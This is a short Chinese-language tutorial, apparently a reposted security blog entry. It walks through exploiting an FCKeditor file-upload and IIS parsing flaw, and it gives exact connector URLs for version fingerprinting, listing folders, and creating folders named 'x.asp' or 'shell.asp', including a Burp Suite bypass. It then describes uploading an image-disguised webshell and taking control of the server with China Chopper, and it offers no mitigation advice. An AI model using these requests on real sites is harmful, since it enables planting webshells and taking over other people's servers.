直接通过已知文件路径,爆出fck编辑器的版本信息:
FCKeditor/_whatsnew.html
通过常用上传地址,来测试可上传点是否存在:
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
JSP 版:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
这里由于本地测试,我直接在可上传点创建一个文件夹 x.asp 。
成功创建文件夹,并上传一张图片马。
我们按F12利用审查元素,来查看上传图片的存放路径:
/userfiles/image/x.asp/x.jpg
我们将保存路径输入到URL地址栏,进行访问!可以看到,我们已经成功访问到我们的图片马。
利用中国菜刀进行连接!成功取得连接!如图:
除了以上,我们可以利用手工尝试外,当然还有相对方便的方式进行利用。我们可以使用大牛集成后的综合利用工具,利用它我们同样可以轻松爆出路径及上传点。这里我对一个2.5的高版本成功爆出了上传点!
但我们会发现,我们无法成功创建.ASP结尾的文件夹。此时,我们打开 burpsuite 截获文件夹创建过程,在当前文件夹/目录下,直接添加我们要创建的文件名称。
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
同样,在成功创建的文件夹内上传我们的图片一句话。并利用审查元素,来获取上传的路径!
最后,使用中国菜刀进行连接即可!
转载请注明:即刻安全 » 简单介绍之Fckeditor上传解析漏洞